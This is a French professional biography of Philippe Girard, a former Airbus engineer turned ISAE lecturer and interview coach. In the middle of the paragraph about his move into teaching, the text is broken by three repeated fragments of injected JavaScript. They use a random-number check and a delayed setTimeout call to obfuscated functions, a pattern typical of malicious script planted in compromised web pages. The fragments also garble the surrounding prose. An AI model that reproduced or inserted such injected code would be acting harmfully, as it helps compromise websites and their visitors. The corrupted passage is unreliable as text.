Philippe Girard

Signes particuliers :

Tourné vers l’autre et sensible à la qualité de la relation. Je crois en la transmission du savoir.

Ingénieur ENSEA de formation, j’ai passé plus de 20 ans chez Airbus Industrie dont 3 ans au sein des Ressources Humaines. En particulier j’ai longtemps travaillé pour les compagnies aériennes en les accueillant à Toulouse et en assurant pour eux le suivi de l’assemblage de leurs avions sur les chaînes de fabrication. J’ai plus particulièrement travaillé avec les compagnies asiatiques.

Passionné par l’enseignement et la transmission du savoir, j’ai fait le choix il y a 2 ans de quitter l’Industrie pour me consacrer pleinement à la formation dans les Grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}es Ecoles. Aujourd’hui, enseignant-chercheur à l’ISAE, j’interviens également dans des écoles de Commerce ou à l’Université. Je suis responsable académique de deux Mastères Spécialisés de l’ISAE (Supaéro–ENSICA).

Je conseille chaque année de très nombreux étudiants pour les accompagner dans leur recherche de stage ou d’emploi en les préparant au mieux aux épreuves orales.

En 20 ans, j’ai fait passer des centaines d’entretiens de sélection pour les recrutements les plus variés. Et j’assure chaque année la présidence de jurys de sélection, notamment à HEC.

Cet engagement pour l’accompagnement des étudiants vers le monde du travail m’apporte aussi un équilibre personnel.